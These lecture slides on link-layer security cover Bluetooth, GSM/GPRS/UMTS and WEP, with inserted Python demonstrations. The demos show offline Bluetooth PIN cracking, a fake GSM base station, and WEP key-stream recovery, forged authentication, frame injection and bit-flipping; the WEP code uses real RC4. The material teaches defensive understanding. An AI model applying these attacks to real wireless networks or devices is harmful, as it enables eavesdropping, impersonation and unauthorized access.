Protocols (Physical/Data-Link Layer) - uni-luebeck.de · 2015-05-05


Page 1: Protocols (Physical/Data-Link Layer) - uni-luebeck.de · 2015-05-05

Distributed Systems Security

PD Dr. Dennis Pfisterer

Institut für Telematik, Universität zu Lübeck

http://www.itm.uni-luebeck.de/people/pfisterer

Protocols (Physical/Data-Link Layer)

Page 2: Overview

• Security on Different Layers

• Security on Physical & Data-Link Layer
– Mostly security in wireless networks
– Bluetooth
– GSM / GPRS / UMTS
– Wireless LANs (IEEE 802.11a/b/g, 802.11i)

Security - 07 Physical/Data Link Layer #2

Page 3: Security on Different Layers

Page 4: Security on Different Layers

• Where do we place security mechanisms? – Pros and cons on different protocol layers?

• Physical / Data-Link Layer – E.g., Bluetooth, WEP/WPA/WPA2 in WLAN

• Network Layer – E.g., IPSec, L2TP

• Transport Layer – E.g., SSL/TLS

• Application Layer – E.g., PGP, Kerberos

[Figure: four protocol stacks, each with the security mechanism drawn at a different layer]
– Data-link layer: PHY | LLC/MAC | WEP | IP | TCP/UDP | HTTP FTP SMTP
– Network layer: LLC/MAC | IP | IPSec | TCP/UDP | HTTP FTP SMTP
– Transport layer: IP | TCP | SSL/TLS | HTTP SMTP
– Application layer: IP | TCP/UDP | S/MIME PGP SET Kerberos

Page 5: Security in Lower Layers (PHY, DL)

• Protection of (some) individual links

+ Transparent for upper layers (i.e., IP, TCP, and application)

+ Minimal changes in protocol stack

– Security for single hops only

– No end-to-end security

– Not flexibly controllable by applications

[Figure: link-layer protection covers a single hop only, e.g., one directional radio link]

Page 6: Security in Network/Transport Layer

• Protection on the IP and/or TCP/UDP layer

+ Transparent for applications on network layer (IP → IPSec)

+ End-to-end security across insecure infrastructures

+ Complete connections securable (e.g., using VPNs)

+ Transport layer security controllable by / visible to applications (e.g., https instead of http)

– IPSec not controllable by / visible to applications

– Transport layer (TLS over TCP) requires application changes

[Figure: end-to-end connection security for any application layer protocol, e.g., FTP, Web Apps, SMTP, POP, IMAP, ...]

Page 7: Security in Application Layer

• Application security provided by the application

+ Flexibly controllable by applications

– Each application has its own custom-tailored security services

– No synergy between different applications

– E.g., Kerberos, S/MIME, PGP, GnuPG provide their own implementations

[Figure: end-to-end connection security by a secure application layer protocol, e.g., PGP, S/MIME, SMTPS, POP3S, IMAPS, ...]

Page 8: Bluetooth

Page 9: Bluetooth (IEEE 802.15.1)

• Universal radio interface for ad-hoc wireless connectivity
– Interconnect computers, peripherals, handhelds, smart phones, …
– Replacement of Infrared Data Association (IrDA) technology

• Embedded in other devices – Goal: less than 5 €/device
– Short range (10 m)
– Low power consumption
– Voice and data transmission (~1 Mbit/s)

Page 10: Bluetooth Versions

Version      Changes                                                                              Year
1.0 / 1.0B   Non-standard, bad interoperability, never deployed at scale
1.1          Adds Received Signal Strength Indication (RSSI)                                      2002
1.2          Less susceptible to noise due to adaptive frequency-hopping spread spectrum (AFH)    2003
2.0 + EDR    Support for higher speeds (3 Mbit/s gross, ~2 Mbit/s net)                            2004
2.1 + EDR    Adds Secure Simple Pairing and support for quality of service                        2007
3.0 + HS     Discontinued                                                                         2009
4.0          "Low Energy" protocol stack and profiles (<5 ms for connection setup), AES encryption 2010

Page 11: Characteristics

• Time division multiplexing for send/receive separation

• Voice transmission
– SCO (Synchronous Connection-Oriented) traffic
– FEC (forward error correction), no retransmission
– 64 kbit/s duplex, point-to-point, circuit switched

• Data transmission
– ACL (Asynchronous Connection-Less) traffic
– Asynchronous, packet switched traffic support
– 433.9 kbit/s symmetric traffic
– 723.2 / 57.6 kbit/s asymmetric

Page 12: Characteristics

• 2.4 GHz ISM band, 79 channels, 1 MHz spacing (2402…2480 MHz)

• Range / Device classes
– class 1 (100 mW); ~100 m
– class 2 (2.5 mW); ~10 m
– class 3 (1 mW); ~1 m

• Frequency hopping with 1600 hops/s
– Hopping sequence in a pseudo random fashion, determined by a master

Page 13: Frequency Hopping

• Can it be used as a security mechanism?
– No: the hopping sequence is a public, deterministic function of the master's device address (BD_ADDR) and clock, and the master sends both in the clear (FHS packet) so that slaves can synchronize. Any receiver that obtains them follows the sequence; hopping is a robustness measure against interference, not a confidentiality mechanism.

Page 14: Bluetooth Piconet

• Collection of devices connected in an ad-hoc fashion

• One unit acts as master
– Others are slaves for the lifetime of the Piconet
– Up to 7 simultaneous slaves per Piconet (> 200 could be parked)

• Master determines hopping pattern, slaves have to synchronize
– Each Piconet has a unique hopping pattern
– Participation in a Piconet = synchronization to hopping sequence

[Figure: piconets with master (M), slaves (S), parked devices (P) and standby devices (SB)]
M Master; S Slave; P Parked; SB Standby
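As an added illustration of the point made on pages 12 to 14 (example code, not part of the original slides), the Python below models a piconet whose channel sequence is a deterministic function of the master's address and clock. The hop-selection function is a stand-in (SHA-256 based), not the kernel defined in the Bluetooth Core specification; the master address and clock values are constructed. It shows that an eavesdropper who reads address and clock from the FHS packet follows every hop, while one without the clock, or parked on one channel, sees about 1/79 of the slots.

```python
import hashlib

CHANNELS = 79            # 2402 + k MHz, k = 0..78
HOPS_PER_SECOND = 1600


def hop_channel(master_addr, master_clock):
    """Channel for one slot.

    Stand-in hop-selection kernel (assumption): the real Bluetooth kernel is a
    different function, but like this one it is a public, deterministic function
    of the master's 48-bit BD_ADDR and 28-bit clock. Only that property matters here.
    """
    seed = master_addr.to_bytes(6, "big") + (master_clock & 0x0FFFFFFF).to_bytes(4, "big")
    return hashlib.sha256(seed).digest()[0] % CHANNELS


def hop_sequence(master_addr, start_clock, slots):
    """Channels used by the piconet for `slots` consecutive slots."""
    return [hop_channel(master_addr, start_clock + i) for i in range(slots)]


def follow_rate(master_addr, true_clock, attacker_clock, slots=HOPS_PER_SECOND):
    """Fraction of slots on which a receiver that believes the master clock is
    `attacker_clock` tunes to the channel the piconet really uses."""
    truth = hop_sequence(master_addr, true_clock, slots)
    guess = hop_sequence(master_addr, attacker_clock, slots)
    return sum(t == g for t, g in zip(truth, guess)) / slots


def fixed_channel_rate(master_addr, true_clock, channel, slots=HOPS_PER_SECOND):
    """What a receiver parked on a single channel sees of the piconet's traffic."""
    return sum(c == channel for c in hop_sequence(master_addr, true_clock, slots)) / slots


if __name__ == "__main__":
    # Constructed values: a master address and clock as an eavesdropper would
    # read them from the master's FHS packet during inquiry/page.
    master = 0x00112233AABB
    clock = 0x0012345
    print("parked on channel 0:      %.3f" % fixed_channel_rate(master, clock, 0))
    print("clock off by one slot:    %.3f" % follow_rate(master, clock, clock + 1))
    print("address+clock from FHS:   %.3f" % follow_rate(master, clock, clock))
```

With the correct address and clock the follow rate is 1.0; a clock that is off by a single slot, or a receiver parked on one channel, lands on the right channel in roughly one slot out of 79. The difference between the two cases is knowledge of public parameters, not of a secret.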

Page 15: Bluetooth Security

[Figure: legacy Bluetooth key hierarchy]
– Pairing / authentication key generation (permanent storage): PIN (1–16 byte, user input) → E2 → link key (128 bit); the link key is used for authentication
– Encryption key generation (temporary storage): link key → E3 → encryption key (128 bit) → payload key → keystream generator; data ⊕ keystream = ciphering

Page 16: Bluetooth Rifle

• Description of an attack against Bluetooth
– Details: http://www.tomsguide.com/us/how-to-bluesniper-pt1,review-408-9.html

• "Rifle" enables communication across large distances (~1 km) with standard Bluetooth devices

• What kind of attacks?

Image source: http://www.tomsguide.com/us/how-to-bluesniper-pt1,review-408.html

Page 17: Bluetooth Security Issues

How can we attack confidentiality? See below! Does it ring a bell?

Security Issue | Remark
Short PINs are allowed. | Weak PINs, which are used for the generation of link and encryption keys, can be easily guessed. People tend to select short PINs.
Attempts for authentication are repeated. | A limiting feature needs to be incorporated in the specification to prevent unlimited requests. The Bluetooth specification currently requires a time-out period between repeated attempts that will increase exponentially. Note that this back-off only limits online guessing: an attacker who has recorded a legacy pairing and authentication exchange can test PIN candidates offline, where no time-out applies.
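The "short PIN" row above describes what is, in practice, an offline attack; the Python below is an added example (not part of the original slides) of it. Before Secure Simple Pairing (v2.1), every value exchanged during pairing and authentication except the PIN goes over the air in clear: IN_RAND, the two masked LK_RAND values, AU_RAND and SRES. An eavesdropper who records them tries every PIN offline, so the exponential back-off in the table never triggers. The Bluetooth functions E1, E21 and E22 are SAFER+ based; the HMAC-SHA256 stand-ins here are an assumption that keeps the structure of the exchange without reproducing the cipher, and the device addresses and PIN are constructed.

```python
import hashlib
import hmac
import itertools
import os


def _prf(label, *parts, n=16):
    """Stand-in for the SAFER+-based Bluetooth functions (assumption: any
    deterministic keyed function shows the same attack structure)."""
    return hmac.new(label, b"".join(parts), hashlib.sha256).digest()[:n]


def E22(pin, bd_addr, in_rand):          # -> initialization key Kinit
    return _prf(b"E22", pin, bd_addr, in_rand)


def E21(lk_rand, bd_addr):                # -> one device's link-key share
    return _prf(b"E21", lk_rand, bd_addr)


def E1(link_key, au_rand, bd_addr):       # -> SRES (32 bit)
    return _prf(b"E1", link_key, au_rand, bd_addr, n=4)


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def legacy_pairing(pin, addr_a, addr_b, rng=os.urandom):
    """Pre-2.1 pairing (combination key) followed by one authentication.
    Returns everything a passive sniffer sees, and the resulting link key."""
    in_rand = rng(16)                                   # sent in clear
    k_init = E22(pin, addr_b, in_rand)
    lk_rand_a, lk_rand_b = rng(16), rng(16)
    c_a, c_b = xor(lk_rand_a, k_init), xor(lk_rand_b, k_init)   # sent in clear
    link_key = xor(E21(lk_rand_a, addr_a), E21(lk_rand_b, addr_b))
    au_rand = rng(16)                                   # A challenges B, in clear
    sres = E1(link_key, au_rand, addr_b)                # B's answer, in clear
    sniffed = {"in_rand": in_rand, "c_a": c_a, "c_b": c_b,
               "au_rand": au_rand, "sres": sres}
    return sniffed, link_key


def crack_pin(sniffed, addr_a, addr_b, digits=4):
    """Offline PIN search over all numeric PINs of the given length. Each guess is
    verified against the sniffed SRES; no packet is ever sent, so the spec's
    exponential back-off between authentication attempts never applies."""
    for t in itertools.product("0123456789", repeat=digits):
        pin = "".join(t).encode()
        k_init = E22(pin, addr_b, sniffed["in_rand"])
        lk_rand_a = xor(sniffed["c_a"], k_init)         # unmask with the guessed Kinit
        lk_rand_b = xor(sniffed["c_b"], k_init)
        link_key = xor(E21(lk_rand_a, addr_a), E21(lk_rand_b, addr_b))
        if E1(link_key, sniffed["au_rand"], addr_b) == sniffed["sres"]:
            return pin, link_key                        # PIN and the long-term link key
    return None, None


if __name__ == "__main__":
    A, B = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")   # constructed
    sniffed, real_key = legacy_pairing(b"7391", A, B)
    pin, key = crack_pin(sniffed, A, B)
    print("recovered PIN", pin, "link key matches:", key == real_key)
```

A four-digit PIN costs 10,000 candidate evaluations, a fraction of a second here. Because SRES is only 32 bits, a wrong PIN matches with probability 2^-32 per guess; a second recorded AU_RAND/SRES pair rules that out. The recovered link key is the long-term key, so the attacker can also decrypt later sessions derived from it.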

Page 18: Security Summary Bluetooth

• Prior to Bluetooth v2.1, encryption is not required and can be turned off at any time. Moreover, the encryption key is only good for approximately 23.5 hours; using a single encryption key longer than this time allows simple XOR attacks to retrieve the encryption key.
– Turning off encryption is required for several normal operations, so it is problematic to detect if encryption is disabled for a valid reason or for a security attack.
– Bluetooth v2.1 addresses this in the following ways:
• Encryption is required for all non-SDP (Service Discovery Protocol) connections
• A new Encryption Pause and Resume feature is used for all normal operations requiring encryption to be disabled. This enables easy identification of normal operation from security attacks.
• The encryption key is required to be refreshed before it expires.

• Link keys may be stored on the device file system, not on the Bluetooth chip itself. Many Bluetooth chip manufacturers allow link keys to be stored on the device; however, if the device is removable this means that the link key will move with the device.

Page 19: GSM / GPRS / UMTS

Page 20: Global System for Mobile Communication

• Pan-European standard
– From European Telecommunications Standards Institute (ETSI)

• Many providers world-wide use GSM
– 219 countries in Asia, Africa, Europe, Australia, and America
– >4.2 billion subscribers in >700 networks
– >75% of all digital mobile phones use GSM
– >29 billion SMS in Germany in 2008 (>10% of revenues of many operators)
– More information: http://www.gsma.com

Page 21: GSM: Goals and Features

• Goal of GSM
– Replace analog telephony systems (e.g., A-/B-/C-networks in Germany)
– Create a "mobile ISDN"
– Digital mobile telephony system allowing Europe-wide user mobility
– Mobile data services

• Features
– Communication: mobile and wireless; support voice and data
– Mobility: international access, SIM enables use of different providers
– Worldwide connectivity (one number, network handles localization)
– High quality: high audio quality and uninterrupted phone calls
– Security: access control, authentication via chip-card and PIN

Page 22: GSM: Architecture

[Figure: GSM architecture – MS + SIM ↔ BTS (radio subsystem, RSS) ↔ BSC ↔ MSC / GMSC (network and switching subsystem, NSS, with VLR and HLR) ↔ fixed network; operation subsystem OSS with OMC, EIR, AUC]
(G)MSC: (Gateway) Mobile Switching Center; BSC: Base Station Controller; BTS: Base Transceiver Station; HLR, VLR: Home/Visitor Location Register; OMC: Operation and Maintenance Center; EIR: Equipment Identity Register; AUC: Authentication Center; MS: Mobile Station

Page 23: SIM Card: Features

• SIM: Subscriber Identity Module
– Stores International Mobile Subscriber Identity (IMSI) and Unique Serial Number (ICCID)
– Contains key material to identify and authenticate subscribers
– Two passwords: personal identification number (PIN) and Personal Unblocking Code (PUK) for PIN unlocking

• Hardware
– 8 or 16 bit CPU with 10 MHz clock rate, 40–100 kByte ROM, 1–3 kByte RAM, 16–64 kByte EEPROM

• Software
– Simple file system (three types of files, directory tree)
– Special communication protocol for SIM card access specified

Page 24: GSM Security

• GSM intended to be no more vulnerable than a fixed phone
– It's a phone, not a "secure communications device"

• Access control and authentication
– User → SIM: secret PIN (personal identification number)
– SIM → network: challenge response method

• Confidentiality
– Voice, data, and signaling traffic encrypted on the wireless link

• Anonymity
– TMSI (Temporary Mobile Subscriber Identity) newly assigned after each location update
– Avoids tracking the location of users

Page 25: GSM Security: Algorithms

• Three algorithms specified in GSM
– A3 for authentication ("secret", open interface)
– A5 for encryption (standardized)
– A8 for key generation ("secret", open interface)

• "Secrecy" of these algorithms
– Kind of "security through obscurity"
– A3 and A8 are operator-specific; the common reference implementation (COMP128) is available via the Internet

• Network providers can use stronger mechanisms

Page 26: GSM Security: A5 Algorithm

• Currently defined: A5/1, A5/2 and A5/3

• A5 algorithms are standardized to ensure global interoperability

• GSM phones currently (2012) support A5/1 and A5/2
– Most networks use A5/1, some use A5/2
– A5/1 considered insecure, can be broken in real-time [gsm-a5-1]
– A5/2 is a deliberately weakened export variant that is broken far more easily; the GSM Association has since withdrawn it from new handsets
– A5/1 and A5/2 specifications have restricted distribution but the details have been discovered and cryptanalysis has been published

• A5/3 quite new and will be phased in over the next few years
– A5/3 is a codename for the block cipher KASUMI
– Only limited deployment in Europe [gsmmap]

Page 27: GSM: Authentication

[Figure: GSM challenge-response authentication]
– Authentication Center (GSM network): RAND (128 bit), Ki (128 bit) → A3 → SRES* (32 bit)
– SIM: RAND (128 bit), Ki (128 bit) → A3 → SRES (32 bit)
– Mobile Switching Center (MSC): checks SRES* =? SRES
Ki: individual subscriber authentication key; SRES: signed response

Page 28: GSM: Key Generation and Encryption

[Figure: GSM key generation and encryption]
– Authentication Center (GSM network): RAND (128 bit), Ki (128 bit) → A8 → cipher key Kc (64 bit); RAND, SRES and Kc are passed on to the Base Station Subsystem (BSS)
– SIM: RAND (128 bit), Ki (128 bit) → A8 → Kc (64 bit)
– BSS and Mobile Station (MS): data → A5 (keyed with Kc) → encrypted data → A5 (keyed with Kc) → data
Kc: cipher key

Page 29: Attack on GSM (heise.de 12/2011)

• Based on a cheap mobile phone, laptop and free software

• Weakness in A5/1 encryption algorithm
– Break into calls within minutes
– Decrypt and record calls with Temporary Mobile Subscriber Identity (TMSI) and secret key

• Can be used to impersonate a user's identity
– Initiate calls
– Send SMS
– User gets bill (including phone calls to premium services)
– Retrieve mailbox content

Page 30: GSM Security: Summary

• Authentication
– Only the mobile station is authenticated; the network is not (a fake base station is accepted)
– Challenge-response procedure
• AUC generates challenge; VLR/MSC checks response from MS

• Within the network, data (including the RAND/SRES/Kc triplets) is transferred unencrypted

• Confidentiality
– Only on the radio interface (between BTS and MS)
– 64 bit key length is quite small

• Between GSM providers
– No security measures and standards defined
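Pages 27, 28 and 30 describe the one-sided challenge-response. The Python below is an added example (not from the slides) that simulates the exchange with a stand-in A3/A8 (HMAC-SHA256 truncated to a 32-bit SRES and a 64-bit Kc; real A3/A8 are operator specific, e.g. COMP128 variants) and shows the consequence of the missing network authentication: the SIM answers any RAND, so a fake base station obtains valid SRES values without knowing Ki and can order the phone to use A5/0 (no encryption). The IMSI, Ki and class names are constructed.

```python
import hashlib
import hmac
import os


def a3_a8(ki, rand):
    """Stand-in for the operator-specific A3/A8 (assumption). Returns
    (SRES, Kc): SRES is 32 bit, Kc is 64 bit, as in GSM."""
    h = hmac.new(ki, rand, hashlib.sha256).digest()
    return h[:4], h[4:12]


class SIM:
    def __init__(self, imsi, ki):
        self.imsi, self._ki = imsi, ki

    def run_gsm(self, rand):
        """RUN GSM ALGORITHM: the SIM answers whoever sends a RAND."""
        return a3_a8(self._ki, rand)


class AuC:
    def __init__(self):
        self._ki = {}

    def provision(self, imsi, ki):
        self._ki[imsi] = ki

    def triplet(self, imsi):
        """(RAND, SRES, Kc) handed to the VLR/MSC in clear inside the core network."""
        rand = os.urandom(16)
        sres, kc = a3_a8(self._ki[imsi], rand)
        return rand, sres, kc


class GenuineNetwork:
    """VLR/MSC: checks SRES, then selects the cipher in CIPHER MODE COMMAND."""
    def __init__(self, auc, cipher="A5/1"):
        self.auc, self.cipher = auc, cipher

    def authenticate(self, imsi, respond):
        rand, sres_expected, _kc = self.auc.triplet(imsi)
        if respond(rand) != sres_expected:
            raise PermissionError("SRES mismatch")
        return self.cipher


class FakeBTS:
    """IMSI catcher: no Ki needed. It sends its own RAND, collects a genuine SRES,
    and, since the MS never authenticates the network, orders A5/0 (no encryption)."""
    def __init__(self):
        self.log = []

    def authenticate(self, imsi, respond):
        rand = os.urandom(16)
        self.log.append((imsi, rand, respond(rand)))
        return "A5/0"


class MobileStation:
    def __init__(self, sim):
        self.sim = sim

    def attach(self, network):
        """Location update: identical code path for genuine and fake networks."""
        state = {}

        def respond(rand):                 # RAND down, SRES up, Kc kept locally
            sres, kc = self.sim.run_gsm(rand)
            state["kc"] = kc
            return sres

        cipher = network.authenticate(self.sim.imsi, respond)
        return cipher, state["kc"]


def attach_ok(ms, network):
    """True if the network accepted the MS, False on SRES mismatch."""
    try:
        ms.attach(network)
        return True
    except PermissionError:
        return False


if __name__ == "__main__":
    auc = AuC()
    KI = bytes(range(16))                       # constructed subscriber key
    auc.provision("262011234567890", KI)
    ms = MobileStation(SIM("262011234567890", KI))
    print("genuine network:", ms.attach(GenuineNetwork(auc))[0])
    fake = FakeBTS()
    print("fake BTS:", ms.attach(fake)[0], "collected", len(fake.log), "valid SRES")
```

Nothing in `MobileStation.attach` can tell the two networks apart: the only check in the protocol is performed by the network on the SRES, and the cipher choice is dictated by whoever plays the network. UMTS closes this gap with mutual authentication (page 36).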

Page 31: General Packet Radio Service (GPRS)

• Introduced to provide higher data speeds in GSM
– Data transmission speeds of up to 171 kbit/s
– Packet switched instead of circuit switched data transmissions
– Requires new hardware (new radio transceivers at BTS, new backbone)
– Step towards UMTS

• Features
– Uses sending slots only if data packets are to be transmitted
– E.g., for 50 kbit/s 4 slots are allocated temporarily
– Standardization 1998, introduction 2001

• Improvement: Enhanced Data Rates for GSM Evolution (EDGE)
– Up to 384 kbit/s; new radio technology

Page 32: GPRS architecture and interfaces

• GSN (GPRS Support Nodes): GGSN and SGSN
– GGSN (Gateway GSN): Interworking unit between GPRS and PDN (Packet Data Network)
– SGSN (Serving GSN): Supports the MS, performs location, billing, security, …

• GR (GPRS Register): user addresses (e.g., current IP, …)

[Figure: MS –Um– BSS –Gb– SGSN –Gn– GGSN –Gi– PDN; SGSN –Gn– SGSN; MSC/VLR, EIR and HLR/GR attached to the core]

Page 33: GPRS Security

• GPRS uses similar techniques to GSM

• Confidentiality and authentication negotiated and initiated between MS and SGSN (no data integrity protection, as in GSM)
– Often, no security is negotiated
– Not visible to the user

• Users should use upper layer security solutions

Page 34: UMTS

• Universal Mobile Telecommunications System (UMTS)
– New radio interface: UTRA (UMTS Terrestrial Radio Access), W-CDMA based
– New radio access network: UTRAN (UMTS Terrestrial Radio Access Network), consisting of Node B and RNC
– New SIM type: USIM (Universal Subscriber Identity Module)
– UMTS and GSM/EDGE share same core network (CN)

• Enhanced data rates
– UMTS: High Speed Packet Access (HSPA)
• High Speed Downlink Packet Access (HSDPA): up to 337.5 Mbit/s (HSPA+ peak)
• High Speed Uplink Packet Access (HSUPA): up to 23 Mbit/s

Page 35: Core Network: Architecture

[Figure: GSM BSS (BTS –Abis– BSC) and UMTS RNS (Node B –Iub– RNC) connect via Iu (IuCS / IuPS) to the shared core network CN: MSC/VLR – GMSC – PSTN on the circuit-switched side, SGSN –Gn– GGSN –Gi– on the packet-switched side; HLR, AuC, EIR and GR attached]
GSN: GPRS Support Nodes; SGSN: Serving GSN; GGSN: Gateway GSN; RNS: Radio Network Subsystem; RNC: Radio Network Controller

Page 36: UMTS Security

• Builds on GSM security (inherits proven-to-be-good features)

• Correction of the GSM weaknesses
– Possible attacks from a faked base station
– Cipher keys and authentication data transmitted in clear between and within networks
– Encryption not used in some networks → open to fraud
– Data integrity not provided

• Security features for 3G radio access networks and services
– Mutual Authentication
– Stronger Encryption
– Data Integrity

Page 37: Wireless LAN

Page 38: Wireless LAN Standards

• Also known as WLAN and WiFi
– Specifies layer 1 & 2 (physical & data-link layer)

• Standards
– IEEE 802.11 (1997: 1 / 2 Mbps, 2.4 GHz)
– IEEE 802.11a (1999: max. 54 Mbps, 5 GHz)
– IEEE 802.11b (1999: 5.5 Mbps and 11 Mbps, 2.4 GHz)
– IEEE 802.11g (2003: 54 Mbps, 2.4 GHz)
– IEEE 802.11n (2009: 150 Mbps per spatial stream, 2.4 / 5 GHz)
– IEEE 802.11i (2004, enhanced security)

Page 39: 802.11 Infrastructure Mode

• Access Point (AP)
– Bridge between wireless and wired networks
– Composed of
• Radio interface
• Wired network interface (usually 802.3)
• Bridging software
– Aggregates access for multiple wireless stations to wired network

• Wireless station

[Figure: Basic Service Set (BSS) – single cell with one Access Point and its Stations; Extended Service Set (ESS) – multiple cells]

Page 40: Interception

• Wireless LAN uses radio signals
– Not limited to physical buildings

• Signal weakened by walls, floors, and interference

• Directional antenna allows interception over longer distances

[Figure: BSS inside a building; station outside building perimeter]

Page 41: Wardriving

• Software
– Netstumbler
– THC-Wardrive
– Kismet
– Wellenreiter
– Vistumbler
– inSSIDer

• Laptop with (optional) GPS for logging
– MAC address & channel
– Network name (SSID)
– Manufacturer
– Signal strength / noise
– Location

Page 42: Wardriving example

[Figure: screenshot of a wardriving session]

Page 43: Joining a BSS

• APs send beacons (announce WiFi presence)
– May include Service Set Identifier (SSID)
– AP chosen on signal strength and observed error rates

• Client scans channels
– Periodically or on weak signal
– Check for stronger or more reliable APs
– If one is found, it re-associates with new AP

• Open System Authentication
– No authentication or encryption
– Clients only specify SSID when requesting association

Page 44: MAC Address locking

• Access points have Access Control Lists (ACL)

• ACL is list of allowed MAC addresses
– E.g. Allow access to:
• 00:01:42:0E:12:1F
• 00:01:42:F1:72:AE
• 00:01:42:4F:E2:01

• MAC addresses are sniffable and spoofable
– MAC ACLs are an ineffective security technique: an attacker sniffs an allowed address from the air and configures it on his own interface

Page 45: Wireless LANs – Wired Equivalent Privacy (WEP)

Page 46: 802.11b Security Services (Wired Equivalent Privacy)

• Goal: Equivalent security like in LANs
– LAN security features?

• Security Features of 802.11b
– Authentication, Confidentiality, and Integrity
– Wired Equivalent Privacy (WEP)

• Authentication: Shared Key
– Key shared by all APs and clients of an ESS
– 802.11b defines no key management strategy
– Nightmare in large wireless LANs

• Confidentiality: RC4 encryption of data

• Integrity: Integrity Check Value (ICV)

[Figure: Local Area Network (LAN) ≙ 802.11 wireless network: "Wired Equivalent Privacy"]

Page 47: WEP: Shared Key Authentication

• Station requests association with Access Point
– Challenge-Response Scheme

• Procedure
1. AP sends random number (128 byte challenge) to station
2. Station encrypts random number (using RC4, 40 bit shared key and 24 bit IV)
3. Encrypted random number sent to AP
4. AP decrypts received message (using the same key stream)
5. AP compares decrypted number with transmitted one (Step 1)
6. If numbers match, station knows shared secret key

Page 48: WEP: Packet Transmission

• Integrity: compute Integrity Check Value (ICV)
– 32 bit Cyclic Redundancy Check appended to message to create plaintext

• Confidentiality: plaintext encrypted via RC4
– Plaintext XORed with key stream of pseudo random bits
– Key stream is function of 40-bit secret key and 24 bit initialization vector

[Figure: Data || 32 bit CRC → plaintext; Initialization Vector (IV) || Secret key → PRNG (RC4) → key stream; plaintext ⊕ key stream → Ciphertext; transmitted frame = IV || Ciphertext]

Page 49: WEP: Packet Reception

• Decryption: ciphertext decrypted via RC4
– XORed with same key stream as sender
– Generated from 40-bit secret key + 24 bit IV from packet
– Key stream differs per packet (if different IV is used)

• Integrity: Compare received and decrypted ICV with CRC of received data

[Figure: IV (from packet) || Secret key → PRNG (RC4) → key stream; Ciphertext ⊕ key stream → Plaintext = Data || CRC; compare received CRC with CRC(Data)]

Page 50: WEP: Initialization Vector

• IV must be different for every message
– 802.11 standard doesn't specify how IV is calculated

• Different implementations used
– Simple incrementing counter for each message
– Alternating ascending and descending counters
– Some use a pseudo random IV generator

• Can be used for a variety of attacks
– Only 2^24 IVs exist, so a busy network repeats one within hours; a repeated IV with the same key means a repeated key stream

Page 51: WEP: Authentication Weaknesses

• Attack by extracting a single key stream
– AP does not check if IV is reused

• Attack Shared Key Authentication
– Challenge and response provide plain and ciphertext
– M1 ⊕ C1 = M1 ⊕ M1 ⊕ RC4(IV,K) = RC4(IV,K)
– Attacker gets a valid key stream

• May be used for authentication and sending encrypted messages
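Pages 48 to 51 describe WEP encapsulation and the key-stream recovery from a sniffed shared-key authentication. The Python below is an added example (not from the slides): it implements RC4 and WEP encapsulation, recovers the key stream from one observed challenge/response, then authenticates and injects a frame without the key (the AP does not reject a reused IV), and finally, because CRC-32 is linear, flips chosen bits in an encrypted frame while keeping the ICV valid. Key, IV and frame contents are constructed.

```python
import os
import zlib


def rc4(key, n):
    """Plain RC4: key-scheduling followed by n bytes of key stream."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data):
    """WEP integrity check value: CRC-32 of the data, little-endian."""
    return zlib.crc32(data).to_bytes(4, "little")


def wep_encrypt(key, iv, data):
    """Frame body = IV || (data || ICV) XOR RC4(IV || key). Key is 40 or 104 bit."""
    plaintext = data + icv(data)
    return iv + xor(plaintext, rc4(iv + key, len(plaintext)))


def wep_decrypt(key, frame):
    iv, ct = frame[:3], frame[3:]
    pt = xor(ct, rc4(iv + key, len(ct)))
    data, tag = pt[:-4], pt[-4:]
    if icv(data) != tag:
        raise ValueError("ICV mismatch")
    return data


def ap_shared_key_auth(key, station_respond):
    """AP side of shared-key authentication: 128-byte challenge, any IV accepted."""
    challenge = os.urandom(128)
    return wep_decrypt(key, station_respond(challenge)) == challenge


def recover_keystream(challenge, response_frame):
    """M1 XOR C1 = RC4(IV, K): both are on the air during a legitimate login."""
    iv, ct = response_frame[:3], response_frame[3:]
    return iv, xor(ct, challenge + icv(challenge))


def forge_with_keystream(iv, keystream, data):
    """Encrypt without the key: only the recovered (IV, key stream) pair is needed."""
    plaintext = data + icv(data)
    if len(plaintext) > len(keystream):
        raise ValueError("not enough key stream")
    return iv + xor(plaintext, keystream)


def flip_bits(frame, delta):
    """Change data bits of an encrypted frame without the key. CRC-32 is affine:
    crc(x XOR d) = crc(x) XOR crc(d) XOR crc(0...0), so the ICV can be patched."""
    iv, ct = frame[:3], frame[3:]
    tag_delta = xor(icv(delta), icv(bytes(len(delta))))
    return iv + xor(ct, delta + tag_delta)


if __name__ == "__main__":
    K = bytes.fromhex("0123456789")           # constructed 40-bit WEP key
    iv = b"\x01\x02\x03"
    # 1. sniff one legitimate shared-key authentication
    c1 = os.urandom(128)
    response = wep_encrypt(K, iv, c1)
    iv, ks = recover_keystream(c1, response)
    # 2. log in and inject a frame with the recovered key stream, no key involved
    print("forged login accepted:", ap_shared_key_auth(K, lambda c: forge_with_keystream(iv, ks, c)))
    print("injected:", wep_decrypt(K, forge_with_keystream(iv, ks, b"GET /admin")))
    # 3. modify an encrypted frame in flight
    f = wep_encrypt(K, iv, b"amount=10")
    print("flipped:", wep_decrypt(K, flip_bits(f, xor(b"amount=10", b"amount=99"))))
```

The 132 bytes of key stream recovered from one login (128-byte challenge plus 4-byte ICV) are enough to answer every future challenge for the same IV and to inject any frame of up to 128 bytes. The bit-flip in step 3 needs no key stream at all: it works on any captured frame whose plaintext layout the attacker can guess.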

Page 52: WEP: Authentication Weaknesses

• No mutual authentication
– Only client is authenticated
– APs are not authenticated

• Allows man-in-the-middle attacks
– Build and run own AP with same name
– Client connects to AP with best signal
– Attacker forwards messages to real AP

Page 53: WEP: Summary

• WEP dangerous mainly due to wrong key usage
– The IV is simply concatenated with a static key (related per-packet keys), IVs are reused, and the CRC-32 ICV is linear
– Less because of the algorithm itself: RC4 was long used in SSL/TLS (note: since RFC 7465 in 2015, RC4 is prohibited in TLS because of biases in its key stream, so this argument no longer holds today)

• Recommended measures
– WLAN cannot be trusted
– WLAN outside the Intranet separated by Firewall
– Use higher layer Security Protocols to secure communication
• PPTP, IPSec, SSL, SSH, … (PPTP with MS-CHAPv2 is itself broken and should not be relied on)

Page 54

Wireless LANs: IEEE 802.11i (WPA & WPA2)

